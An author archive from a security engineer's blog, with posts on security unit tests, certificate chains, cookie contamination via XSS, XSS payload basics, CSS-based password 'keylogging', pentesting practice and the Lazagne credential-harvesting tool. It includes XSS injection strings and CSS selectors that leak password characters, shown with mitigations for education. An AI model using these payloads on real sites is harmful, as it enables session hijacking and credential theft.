Author Archives: Michael Hendrickx

Security Unit Tests

Testing the watersOne of the reasons why security creates a challenge in software companies, is that, as a security engineer, we fail to meet the developers where they live.

Security tools and processes (pentests) typically result in a human report , or even a particular standardized file format (SARIF, etc).

During technical security reviews, teams often file bugs and do a manual re-check.  They explain what the issue is, rate its risk, give perhaps a detailed remediation plan (rather than a vague “check for malicious user input”), and may retest it when the developer team claims to have fixed the bug.  

A better way to tackle this is to prepare security unit tests.  These are essentially unit tests that check for a security control.  For example, classes such as:

  • Client certification validation
  • OAuth2 Token validation
  • File upload validation
  • WebRequest validation

Testing these could be more automated, and done in a more continuous way.  If one has a Web endpoint that allows client cert authentication, which is signed by our intermediate CA, and have a whitelisted SNI.  For that, we run the following list of tests:

  • Authenticate with the correct certificate (should succeed)
  • Cert with valid SNI, signed by a malicious CA (should fail)
  • Certificate with the wrong SNI, but the correct CA (should fail)
  • Expired certificate, yet the correct SNI and CA (should fail)
  • Revoked cert (SNI, not expired, CA) (should fail)

Some libraries that perform certificate validation, may not perform all checks (CRL check).  For debugging purposes, a developer may include a “fail open” fallback, and that code may be checked in and be deployed to production.

Some more examples:

  • File uploads: check for zip bombs, embedded ZIP’s, malware, malformed formats, XXE, Deserialization, etc. 
  • JWT token validation: look at unsigned tokens, expired tokens, tokens that are generated – and signed- by the wrong issuer, tokens for the wrong audience, wrong signing algorithms (HS* compared to RS*), etc.

So, to summarize, instead of just human output, security tools and processes should still think about creating unit tests.

CertGraph: visualizing the distribution of trusted CA’s

Much of the Internet’s security posture relies on the correct implementation of certificates or certs. We’ve all been taught to look for the “green lock” on websites, and things such as mixed mode and HSTS are a good push for that.

Certs 101:

Websites, say, have a leaf certificate. This certificate holds some metadata, including a key that’s used to decrypt traffic (I oversimplified it, TLS is explained in depth here). That leaf certificate needs to be trusted by your user-agent. Since you can’t trust all certificates in the world, you’d trust whoever issued it. That way, a certificate is signed by a trusted party (a CA); or by a party that’s trusted by a root CA. Typically, root CA’s are trusted by your computer, who allow intermediate CA’s to issue leaf certs.


User agents, and sometimes delegated to the operating system has several pre-installed certificates of these root CA’s. These may be larger number than initially anticipated. A typical windows installation has a few dozens if not hundreds of trusted root CA’s:

Now, each of these root CA’s can trust several intermediate certs, who can issue certs (or trust other CA’s, …). So, essentially you’re trusting hundreds, if not thousands, of entities. These are usually a combination of companies as well as governments.

Since these leafs create several paths to their roots, and since I’m a sucker for visualizing graphs; I decided to graph out the certificates of Alexa’s top 1m websites; but the script crashed after some 67.000 of it.

Note that this is a large dataset, which will slow down the visualization factor of it. You can download the JSON files from GitHub.

The Graph

You can play around with the data set at, (warning, graph rendering might be slow on large datasets) but eventually you’ll have something like the chart below.

distribution of top ~60k popular sites certificates.

Getting the data

The files come with a .NET core 3 client app which will scan a text file of hostnames, and store the certificate chains in a json blob. They’re essentially [rootca]->[intermediate]->[…]->leaf. I only opted for name, subject, expiry, serial and thumbprint, but you can get anything that the X509Certificate2 class gives you. For example., it might be cool to see what CA’s give the longest valid certs, or what keysizes are used, etc…

Technically, I created a custom RemoteCertificateValidationCallback, which is typically used to perform SSL validation, (such as checking CRL’s, as .NET doesn’t do that out of the box).

Again, please play around with, and let me know if you’d see something added to it.


Cross domain cookie contamination

TLDR: XSS attacks can be used to set cookies for sub domains that share the same top level domain. This increases the scope of XSS attacks.

In a cloud world; several applications are hosted under the same top level domain. An organization can have hostnames such as:

  • corporate landing page
  • webmail
  • internal resources .
  • web store.

Since they all share the same top level domain, an XSS vulnerability could help an setting domain wide cookies. Domain-wide cookies are inherited by all sub domains, so it could contaminate cookie values of other sub domains.

The “attack”

There are two main scenarios, both using, which has an exploitable XSS attack, and, which uses cookies for session management. An attacker exploits a victim using the XSS vuln, but instead of doing the obvious cookie stealing or DOM manipulation (on, he can set arbitrary cookies for the entire domain; including If he’d execute something like:


He could successfully “log in” the victim onto an arbitrary account, alter settings or even CSRF tokens.


If a host, such as has a cookie set already, the browser (FF under u18.04 at least, testing others) will present both cookies. I’m currently figuring out what different frameworks to when several cookies are presented with the same name.

This may prove for interesting attacks, especially for applications that are hosted on a “more critical” top level domain, or are “shared” across cloud providers.


Not a fool proof solution, but you probably want to move away from storing values in cookies that can dictate a particular state, unless it can be validated (signature, …), or host applications of different “value” off different top level domains.

If you have a JavaScript rich application, and you handle authentication (api calls, etc) with tokens that you store in cookies; you may want to opt for localStorage or sessionStorage, rather than HTTP cookies.

And of course, don’t host applications with XSS. 🙂

The revival of (cross site) script kiddies.

First off, a Happy 2019!

Being in charge of adjudicating Microsoft’s Cloud Bug Bounty; we see many “low hanging fruit” XSS bugs coming through. While we have tools that catch these bugs, sometimes they slip through the cracks. Also, since machines won’t find every.single.bug.ever; we pay out for interesting bugs, and bump up payouts for high quality reports. Sadly though, many of these bugs make us utter a “how come our tools didn’t catch this?”, rather than a “wow, that’s an interesting approach!”. Needless to say, the latter would get higher payouts.

XSS 101

I hope most of you know cross site scripting (XSS). If you can inject active content (we mean JavaScript, 9 out of 10) into a page that, preferably others will see, you have cross site scripting. There may be other nuances to this, but that’s generally my approach. The best way of showing these; is to perform an

which will display the current context’s domain. Showing the current domain, rather than a “123”, “foo” or “pwnage!!1!” message, clearly shows which domain’s DOM, you have access to. In the world of embedded iframes, that shows to be useful.


Most XSS payloads, and there are several out there, are designed to be injected in a page’s DOM. Since the application you’re targeting may be prefixing some controls, you may have to close a previous tag. The tainted data may be included as an HTML attribute, as part of of a JS script block or just as general HTML content. For these, a payload like:

  • ” onmouseover=”alert(123)
  • “; alert(123); var foo=”
  • </textarea><script>alert(123);</script>

May have to come in effect. Needless to say, that list is endless.


Being on the receiver side of bug bounty submissions, and spending several evenings in HTTP access_log or W3SVC1 log files performing pattern analysis, I see a significant higher breadth than depth. Meaning, that many will try a vanilla <script>alert(123)</script> payload, rather than following how the data ends up in the DOM. Missing out on bugs, and payouts.

So for that, I’d ask that if you find yourself mindlessly copy pasting XSS payloads in each field, don’t see the absence of a alert dialog box as a binary (“the site is not vulnerable”), maybe you just need to perform some taint analysis and try again.

Create random passwords with PowerShell

A task I see myself do occasionally, is to generate a password or other symmetric secret. Of course, to avoid things like “Azure123!” and even going against battery horse stable mechanisms, I like to generate random strings; and store these in a password vault. Either online, or local.

At work, I (have to) use PowerShell quite a bit, so I use the following line to come up with a 20 char random password, containing digits, upper- and lowercase alphanumeric characters:

-join ((48..57)+(65..90)+(97..122) | Get-Random -count 20 | %{[char]$_ })

If you need to include special chars, I typically tend to add (!, #, *, -, @ and ~) to the mix, since they’re unlikely to have a special meaning to an underlying system. Their corresponding ASCII values can be added simple:

-join ((33,35,42,45,64,126)+(48..57)+(65..90)+(97..122) | Get-Random -count 36 | %{[char]$_ })

CSS keyloggers, hype and/or impact

A few days ago, I stumbled across one of the videos of LiveOverflow, where he discusses a so called “CSS keylogger” (github), its impact and novelty.

While there’s nothing new about the attack (it was reported several years ago, yet it popped up again on YCombinator’s HackerNews), I guess it trigger LiveOverflow to make the video.

This “attack”, where CSS is being abuse by altering an object’s background, based on its content; allows it to dubbed as a keylogger. Although, rightfully in his video, keyloggers usually capture keystrokes system wide. As a TLDR; the attack basically works like this:

input[type="password"][value&="a"]{ background-image: url( }
input[type="password"][value&="b"]{ background-image: url( }
input[type="password"][value&="aa"]{ background-image: url( }
input[type="password"][value&="ab"]{ background-image: url( }

The problem, as pointed out too, is that you need a CSS file that’s several megabytes, and potentially has every password in the book (since they don’t get triggered per keystroke, only on the full value), which – when exploited with an HTML injection attack – may not be very feasible and realistic.

One thing that would make this possible though. If you rely on external hosts to host your CSS files, such as CDN (or referenced with an @import rule), you could have a malicious CDN that hosts a pseudo keylogging CSS. Also, while provisioning a file with all passwords may be difficult, any input with a limited key space may be a good target for this attack. PIN codes, or 2FA numeric challenge requests come to mind.

Since people are usually a bit wary where they host their JavaScript files (XSS attacks, etc) – CSS is generally a bit more relaxed.

Ensure that; if you deal with sensitive user input; to host your CSS files in a trusted environment. For defense in depth, you can include a Content Security Policy header that will only allow CSS hosting from whitelisted sources.

Washington State

So, while since I last updated this blog – bad habit of mine. So, I moved a while ago to Washington State, to be closer to work. Still setting everything up, all the usual issues that happen when moving countries, but yay! New places to visit, new people to meet, new things to do!

Nullcon 2017

A few months ago, I was asked to speak at Nullcon 2017, which concluded a few weeks ago. It was very well setup conference, and it attracts a lot of the security community in the Indian subcontinent. A pleasure to speak at, and I’d be happy to do it again in Goa 2018.

I presented how to sign up to Microsoft Azure, in order to find security vulnerabilities in it for our Azure Bug Bounty program. We presented together with Facebook, Google, BugCrowd and HackerOne to entice the community to participate in Bug Bounties.

Anyway, a quick thank you to the organizers, and hope to see you all in 2018 in beautiful, sunny Goa!

The lost art of penetration testing

Just a little rant.
Often, if a security consultant is asked to perform asked to perform a VA/PT (the difference is a whole topic for another day) for a customer in a number of man-days. Obviously, as with most service based deliverables, one quantifies work in the time spent on it. Hours, or -more often- days. But this creates a false sense of security. Time spent is not the right yardstick.

When dealing with a business deadline (i.e: the app needs to be released today, the new portal needs to be pushed next week, …), we often compromise on security; and treat the security audit, or va/pt if you like, as a checkbox:

oh, no critical and/or highs? we’re good to go. We’ll fix the rest later

And that is bad for two reasons:

  • The rest is never fixed
  • You’re ‘protected’ against whoever spends X amount of time on it

This is, in my opinion, why programs such as Bug Bounty programs are so effective, and essential for any organization. Yes, you’re tongue-in-cheek giving attackers the green light to assess your security, but you equally get an assessment 24/7, not limited on time.

After joining Microsoft, I’ve been very involved in some of the Bug Bounty programs MSFT offers, and most of the “juicy bugs” (the real eye openers) are the result of days, weeks and sometimes even months of testing, failing, and retesting.

If you have internal (technical) information security staff, embrace the notion of continuous testing. Yes, some properties need to have a checkbox being assessed before going life, but don’t let anyone stop there. If you don’t have the internal muscle power, embrace a bug bounty program. There are several clever minds out there who would uncover sometimes hard- to find bugs, because they like doing so.

Post exploitation tools: Lazagne

lasagnaOften, after a compromise of a machine, red teams / adversaries search for certificates or credentials to hop to other machines, often referred to as “lateral movement”. When doing so, many use Mimikatz, a tool that extracts credentials, PIN codes and kerberos tickets from memory. There are countless blog articles about how to detect it, and hide it from AV, etc.

But another nifty tool, that many don’t know about is Lazagne. It searches for credentials in files and registry. Not just your windows credentials, but things you save in your browsers, mail clients, FTP clients, keyrings etc.